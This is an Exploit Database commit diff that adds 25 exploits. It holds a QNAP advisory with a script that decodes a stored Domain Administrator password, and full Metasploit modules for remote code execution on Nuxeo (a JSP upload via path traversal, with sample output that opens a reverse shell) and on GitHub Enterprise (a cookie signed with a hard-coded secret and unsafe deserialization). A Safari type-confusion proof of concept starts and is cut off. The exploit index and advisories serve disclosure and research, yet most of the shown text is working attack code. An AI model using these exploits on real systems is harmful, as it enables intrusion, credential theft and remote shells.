DB: 2017-03-28

25 new exploits

Samba < 3.6.2 (x86) - Denial of Serviec (PoC)
Samba < 3.6.2 (x86) - Denial of Service (PoC)
Microsoft Visual Studio 2015 update 3 - Denial of Service
Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow
Apple Safari - 'DateTimeFormat.format' Type Confusion
Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode
Apple Safari - Out-of-Bounds Read when Calling Bound Function

QNAP QTS < 4.2.4 - Domain Privilege Escalation
Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow
Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory
Github Enterprise - Default Session Secret And Deserialization (Metasploit)

B2B Alibaba Clone Script - SQL Injection
B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection
Just Another Video Script 1.4.3 - SQL Injection
Adult Tube Video Script - SQL Injection
Alibaba Clone Script - SQL Injection
B2B Marketplace Script 2.0 - SQL Injection
Php Real Estate Property Script - SQL Injection
Courier Tracking Software 6.0 - SQL Injection
Parcel Delivery Booking Script 1.0 - SQL Injection
Delux Same Day Delivery Script 1.0 - SQL Injection
Hotel Booking Script 1.0 - SQL Injection
Tour Package Booking 1.0 - SQL Injection
Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection
CouponPHP CMS 3.1 - 'code' Parameter SQL Injection
EyesOfNetwork (EON) 5.0 - Remote Code Execution
EyesOfNetwork (EON) 5.0 - SQL Injection
Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)
inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation
This commit is contained in:
Offensive Security 2017-03-28 05:01:16 +00:00
parent d2c8c83204
commit 1f8c35c0c0
27 changed files with 1918 additions and 3 deletions

View file

@ -4513,7 +4513,7 @@ id,file,description,date,author,platform,type,port
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0
36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,lin_x86,dos,0
36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Service (PoC)",2015-04-13,sleepya,lin_x86,dos,0
36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0
36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
@ -5425,6 +5425,11 @@ id,file,description,date,author,platform,type,port
41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
41741,platforms/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",multiple,dos,0
41742,platforms/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",multiple,dos,0
41743,platforms/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8887,6 +8892,7 @@ id,file,description,date,author,platform,type,port
41713,platforms/windows/local/41713.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-10-20,Metasploit,windows,local,0
41721,platforms/windows/local/41721.c,"Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15390,6 +15396,9 @@ id,file,description,date,author,platform,type,port
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
41738,platforms/windows/remote/41738.py,"Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37261,7 +37270,7 @@ id,file,description,date,author,platform,type,port
41137,platforms/php/webapps/41137.txt,"Music Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
41138,platforms/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
41139,platforms/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
41141,platforms/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps,0
41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0
41147,platforms/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",hardware,webapps,0
@ -37630,3 +37639,19 @@ id,file,description,date,author,platform,type,port
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
41724,platforms/php/webapps/41724.txt,"Just Another Video Script 1.4.3 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
41725,platforms/php/webapps/41725.txt,"Adult Tube Video Script - SQL Injection",2017-03-25,"Ihsan Sencan",php,webapps,0
41726,platforms/php/webapps/41726.txt,"Alibaba Clone Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
41727,platforms/php/webapps/41727.txt,"B2B Marketplace Script 2.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
41728,platforms/php/webapps/41728.txt,"Php Real Estate Property Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
41729,platforms/php/webapps/41729.txt,"Courier Tracking Software 6.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
41730,platforms/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
41731,platforms/php/webapps/41731.txt,"Delux Same Day Delivery Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
41732,platforms/php/webapps/41732.txt,"Hotel Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
41733,platforms/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
41735,platforms/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0
41736,platforms/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0
41746,platforms/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,php,webapps,0
41747,platforms/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,php,webapps,0
41748,platforms/jsp/webapps/41748.rb,"Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,jsp,webapps,0
41749,platforms/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,215 @@
QNAP QTS Domain Privilege Escalation Vulnerability
Name Sensitive Data Exposure in QNAP QTS
Systems Affected QNAP QTS (NAS) all model and all versions < 4.2.4
Severity High 7.9/10
Impact CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
Vendor http://www.qnap.com/
Advisory http://www.ush.it/team/ush/hack-qnap/qnap.txt
Authors Pasquale "sid" Fiorillo (sid AT ush DOT it)
Guido "go" Oricchio (g.oricchio AT pcego DOT com)
Date 20170322
I. BACKGROUND
QNAP Systems, founded in 2004, provides network attached storage (NAS)
and network video recorder (NVR) solutions for home and business use to
the global market.
QNAP also delivers a cloud service, called myQNAPcloud, that allows
users to access and manage the devices from anywhere.
QTS is a QNAP devices proprietary firmware based on Linux.
ISGroup (http://www.isgroup.biz/) is an Italian Information Security
boutique, we found this 0day issue while supporting Guido Oricchio
of PCego, a System Integrator, to secure a QNAP product for one of his
customer.
Responsible disclosure with Qnap: we contacted qnap on public security@
contact and we escalate fast to their Security Researcher Myron Su on
PGP emails.
Prior vulnerabilities in QNAP:
https://www.qnap.com/en/support/con_show.php?op=showone&cid=41
Information to customers of the vulnerability is shown in their bulletin
ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):
QTS 4.2.4 Build 20170313 includes security fixes for the following
vulnerabilities: Configuration file vulnerability (CVE-2017-5227)
reported by Pasquale Fiorillo of the cyber security company ISGroup
(www.isgroup.biz), a cyber security company, and Guido Oricchio of
PCego (www.pcego.com), a system integrator.
The latest version of the software at the time of writing can be
obtained from:
https://www.qnap.com/en-us/product_x_down/
https://start.qnap.com/en/index.php
https://www.qnap.com/
II. DESCRIPTION
The vulnerability allows a local QTS admin user, or other low privileged
user, to access configuration file that includes a bad crypted Microsoft
Domain Administrator password if the NAS was joined to a Microsoft
Active Directory domain.
The affected component is the "uLinux.conf" configuration file,
created with a world-readable permission used to store a Domain
Administrator password.
Admin user can access the file using ssh that is enabled by default.
Other users are not allowed to login, so they have to exploit a
component, such as a web application, to run arbitrary command or
arbitrary file read.
TLDR: Anyone is able to read uLinux.conf file, world readable by
default, can escalate to Domain Administrator if a NAS is a domain
member.
III. ANALYSIS
QNAP QTS stores "uLinux.conf" configuration file in a directory
accessible by "nobody" and with permission that make them readable by
"nobody".
If the NAS was joined to an Active Directory, such file contain a Domain
Administrator user and password in an easily decrypt format.
In older versions of QTS the Domain Admin's password was stored in
plaintext.
A) Config file readable by "nobody"
[~] # ls -l /etc/config/uLinux.conf
-rw-r--r-- 1 admin administ 7312 Dec 10 06:39 /etc/config/uLinux.conf
Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U,
TS-469L, and TS-221. Access to the needed file are guaranteed to
all the local users, such as httpdusr used to running web sites and
web application hosted on the NAS.
This expose all the information contained in the configuration file at
risk and this is a violation of the principle of least privilege.
https://en.wikipedia.org/wiki/Principle_of_least_privilege
B) Weak encrypted password in the configuration file
The Microsoft Active Directory Admin username and password are stored
in the file obfuscated by a simple XOR cypher and base64 encoded.
In this scenario, a Local File Read vulnerability could lead to full
domain compromise given the fact that an attacker can re-use such
credentials to authenticate against a Domain Controller with maximum
privileges.
The password field in the uLinux.conf has the following format:
User = <username>
Password = <base64>
eg:
User = Administrator
Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
The "<base64>" decoded is:
sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
00000000 03 03 00 00 01 01 06 06 07 07 04 04 23 23 20 20 |............## |
00000010 21 21 26 26 27 27 24 24 43 |!!&&''$$C|
00000019
Each byte xored with \x62 is the hex ascii code of the plaintext char.
Eg:
\x03 ^ \x62 = \x61 (a)
\x00 ^ \x62 = \x61 (b)
...
\x24 ^ \x62 = \x46 (F)
\x43 ^ \x62 = \x21 (!)
The plaintext password is: aabbccddeeffAABBCCDDEEFF!
IV. EXPLOIT
The following code can be used to decode the password:
#!/usr/bin/php
<?php
$plaintext = str_split(base64_decode($argv[1]));
foreach($plaintext as $chr) {
echo chr(ord($chr)^0x62);
}
echo "\n";
Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
aabbccddeeffAABBCCDDEEFF!
V. VENDOR RESPONSE
Vendor released QTS 4.2.4 Build 20170313 that contains the proper
security patch. At the time of this writing an official patch is
currently available.
VI. CVE INFORMATION
Mitre assigned the CVE-2017-5227 for this vulnerability, internally to
Qnap it's referred as Case NAS-201703-21.
VII. DISCLOSURE TIMELINE
20161212 Bug discovered
20170106 Request for CVE to Mitre
20170106 Disclosure to security@qnap.com
20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)
20170107 Details disclosure to Myron Su
20170109 Got CVE-CVE-2017-5227 from cve-assign
20170110 Myron Su confirm the vulnerability
20170203 We asks for updates, no release date from vendor
20170215 We extend the disclosure date as 28 Feb will not be met
20170321 QNAP releases the QTS 4.2.4 Build 20170313
20170322 Advisory disclosed to the public
VIII. REFERENCES
[1] Top 10 2013-A6-Sensitive Data Exposure
https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure
[2] Access Control Cheat Sheet
https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
[3] https://forum.qnap.com/viewtopic.php?t=68317
20121213 User reporting that the password was stored in plaintext in
a world-readable file
[4] https://www.qnap.com/en/support/con_show.php?cid=113
Qnap Security Bullettin NAS-201703-21
IX. CREDIT
Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the
discovery of this vulnerability.
Pasquale "sid" Fiorillo
web site: http://www.pasqualefiorillo.it/
mail: sid AT ush DOT it
Guido "go" Oricchio
web site: http://www.pcego.com/
mail: g.oricchio AT pcego DOT com
X. LEGAL NOTICES
Copyright (c) 2017 Pasquale "sid" Fiorillo
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

216
platforms/jsp/webapps/41748.rb Executable file
View file

@ -0,0 +1,216 @@
=begin
# Description
Nuxeo Platform is a content management system for enterprises (CMS).
It embeds an Apache Tomcat server, and can be managed through a web
interface.
One of its features allows authenticated users to import files to the
platform.
By crafting the upload request with a specific ``X-File-Name`` header,
one can successfuly upload a file at an arbitrary location of the server
file system.
It is then possible to upload a JSP script to the root directory of the
web application to execute commands on the remote host operating system.
Setting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the
``X-File-Name`` header is a way to do so.
## Details
**CVE ID**: CVE-2017-5869
**Access Vector**: network
**Security Risk**: high
**Vulnerability**: CWE-434
**CVSS Base Score**: 8.8
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# Proof of Concept
Here is a metasploit module to exploit this vulnerability:
=end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Nuxeo Platform File Upload RCE",
'Description' => %q{
The Nuxeo Platform tool is vulnerable to an authenticated remote code execution,
thanks to an upload module.
},
'License' => MSF_LICENSE,
'Author' => ['Ronan Kervella <r.kervella@sysdream.com>'],
'References' =>
[
['https://nuxeo.com/', '']
],
'Platform' => %w{linux},
'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],
'Arch' => ARCH_JAVA,
'Privileged' => true,
'Payload' => {},
'DisclosureDate' => "",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),
OptString.new('USERNAME', [true, 'A valid username', '']),
OptString.new('PASSWORD', [true, 'Password linked to the username', ''])
], self.class)
end
def jsp_filename
@jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'
end
def jsp_path
'nxserver/nuxeo.war/' + jsp_filename
end
def nuxeo_login
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/login.jsp')
)
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
session_cookie = res.get_cookies
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'),
'cookie' => session_cookie,
'vars_post' => {
'user_name' => datastore['USERNAME'],
'user_password' => datastore['PASSWORD'],
'submit' => 'Connexion'
}
)
return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')
nil
end
def trigger_shell
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, jsp_filename)
)
fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200
end
def exploit
print_status("Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
session_cookie = nuxeo_login
if session_cookie
payload_url = normalize_uri(target_uri.path, jsp_filename)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'),
'cookie' => session_cookie,
'headers' => {
'X-File-Name' => '../../' + jsp_path,
'X-Batch-Id' => '00',
'X-File-Size' => '1024',
'X-File-Type' => '',
'X-File-Idx' => '0',
'X-Requested-With' => 'XMLHttpRequest'
},
'ctype' => '',
'data' => payload.encoded
)
fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200
print_status("Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.")
trigger_shell
else
fail_with(Failure::Unknown, 'Unable to login')
end
end
end
=begin
Module output:
```bash
msf> use exploit/multi/http/nuxeo
msf exploit(nuxeo) > set USERNAME user1
USERNAME => user1
msf exploit(nuxeo) > set PASSWORD password
PASSWORD => password
msf exploit(nuxeo) > set rhost 192.168.253.132
rhost => 192.168.253.132
msf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(nuxeo) > set lhost 192.168.253.1
lhost => 192.168.253.1
msf exploit(nuxeo) > exploit
[-] Handler failed to bind to 192.168.253.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Authenticating using user1:password
[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.
[*] Command shell session 1 opened (172.17.0.2:4444 ->
192.168.253.132:43279) at 2017-01-13 14:47:25 +0000
id
uid=1000(nuxeo) gid=1000(nuxeo)
groups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
pwd
/var/lib/nuxeo/server
```
# Vulnerable code
The vulnerable code is located in the
`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github
link](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),
where the header ``X-File-Name`` is not checked.
# Fix
Nuxeo provided a
[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)
for this issue.
A hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).
Please note that vulnerability does not affect Nuxeo versions above 7.3.
# Affected versions
* Nuxeo 6.0 (LTS 2014), released 2014-11-06
* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15
* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24
* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24
# Unaffected versions
* Nuxeo 6.0 HF35, released 2017-01-12
* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02
* Nuxeo 7.10 (LTS 2015), released 2015-11-09
* Nuxeo 8.10 (LTS 2016), released 2016-12-06
# Credits
Ronan Kervella <r.kervella@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
=end

View file

@ -2,7 +2,6 @@
; File name: reversebash.nasm
; Author: Jasmin Landry (@JR0ch17)
; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
; To change
; Shellcode length: 110 bytes
; Tested on Ubuntu 12.04.5 32-bit (x86)
; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g

195
platforms/linux/remote/41744.rb Executable file
View file

@ -0,0 +1,195 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Github Enterprise Default Session Secret And Deserialization Vulnerability",
'Description' => %q{
This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6.
The first is that the session management uses a hard-coded secret value, which can be
abused to sign a serialized malicious Ruby object. The second problem is due to the
use of unsafe deserialization, which allows the malicious Ruby object to be loaded,
and results in arbitrary remote code execution.
This exploit was tested against version 2.8.0.
},
'License' => MSF_LICENSE,
'Author' =>
[
'iblue <iblue[at]exablue.de>', # Original discovery, writeup, and PoC (he did it all!)
'sinn3r' # Porting the PoC to Metasploit
],
'References' =>
[
[ 'EDB', '41616' ],
[ 'URL', 'http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html' ],
[ 'URL', 'https://enterprise.github.com/releases/2.8.7/notes' ] # Patched in this version
],
'Platform' => 'linux',
'Targets' =>
[
[ 'Github Enterprise 2.8', { } ]
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 8443
},
'Privileged' => false,
'DisclosureDate' => 'Mar 15 2017',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path for Github Enterprise', '/'])
], self.class)
end
def secret
'641dd6454584ddabfed6342cc66281fb'
end
def check
uri = normalize_uri(target_uri.path, 'setup', 'unlock')
res = send_request_cgi!({
'method' => 'GET',
'uri' => uri,
'vars_get' =>{
'redirect_to' => '/'
}
})
unless res
vprint_error('Connection timed out.')
return Exploit::CheckCode::Unknown
end
unless res.get_cookies.match(/^_gh_manage/)
vprint_error('No _gh_manage value in cookie found')
return Exploit::CheckCode::Safe
end
cookies = res.get_cookies
vprint_status("Found cookie value: #{cookies}, checking to see if it can be tampered...")
gh_manage_value = CGI.unescape(cookies.scan(/_gh_manage=(.+)/).flatten.first)
data = gh_manage_value.split('--').first
hmac = gh_manage_value.split('--').last.split(';', 2).first
vprint_status("Data: #{data.gsub(/\n/, '')}")
vprint_status("Extracted HMAC: #{hmac}")
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
vprint_status("Expected HMAC: #{expected_hmac}")
if expected_hmac == hmac
vprint_status("The HMACs match, which means you can sign and tamper the cookie.")
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def get_ruby_code
b64_fname = "/tmp/#{Rex::Text.rand_text_alpha(6)}.bin"
bin_fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}.bin"
register_file_for_cleanup(b64_fname, bin_fname)
p = Rex::Text.encode_base64(generate_payload_exe)
c = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; "
c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); "
c << "%x(chmod +x #{bin_fname}); "
c << "%x(#{bin_fname})"
c
end
def serialize
# We don't want to run this code within the context of Framework, so we run it as an
# external process.
# Brilliant trick from Brent and Adam to overcome the issue.
ruby_code = %Q|
module Erubis;class Eruby;end;end
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
erubis = Erubis::Eruby.allocate
erubis.instance_variable_set :@src, \\"#{get_ruby_code}; 1\\"
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
proxy.instance_variable_set :@instance, erubis
proxy.instance_variable_set :@method, :result
proxy.instance_variable_set :@var, "@result"
session =
{
'session_id' => '',
'exploit' => proxy
}
print Marshal.dump(session)
|
serialized_output = `ruby -e "#{ruby_code}"`
serialized_object = [serialized_output].pack('m')
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, serialized_object)
return serialized_object, hmac
end
def send_serialized_data(dump, hmac)
uri = normalize_uri(target_uri.path)
gh_manage_value = CGI.escape("#{dump}--#{hmac}")
cookie = "_gh_manage=#{gh_manage_value}"
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'cookie' => cookie
})
if res
print_status("Server returned: #{res.code}")
end
end
def exploit
dump, hmac = serialize
print_status('Serialized Ruby stager')
print_status('Sending serialized Ruby stager...')
send_serialized_data(dump, hmac)
end
end
=begin
Handy information:
To deobfuscate Github code, use this script:
https://gist.github.com/wchen-r7/003bef511074b8bc8432e82bfbe0dd42
Github Enterprise's Rack::Session::Cookie saves the session data into a cookie using this
algorithm:
* Takes the session hash (Json) in env['rack.session']
* Marshal.dump the hash into a string
* Base64 the string
* Append a hash of the data at the end of the string to prevent tampering.
* The signed data is saved in _gh_manage'
The format looks like this:
[ DATA ]--[ Hash ]
Also see:
https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb
=end

View file

@ -0,0 +1,56 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1036
There is a type confusion vulnerability when calling DateTimeFormat.format. This function is provided as a bound function by a getter in the DateTimeFormat class. Binding the function ensures that the this object is of the right type. However, when the bound function is called, it calls into user script when converting the date parameter, which can call Function.caller, obtaining the unbound function. This type unsafe function can then be called on any type.
A minimal PoC is as follows, and a full PoC is attached.
var i = new Intl.DateTimeFormat();
var q;
function f(){
q = f.caller;
return 10;
}
i.format({valueOf : f});
q.call(0x77777777);
-->
<html>
<body>
<script>
var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));
var i = new Intl.DateTimeFormat();
//print(i);
var q;
function f(){
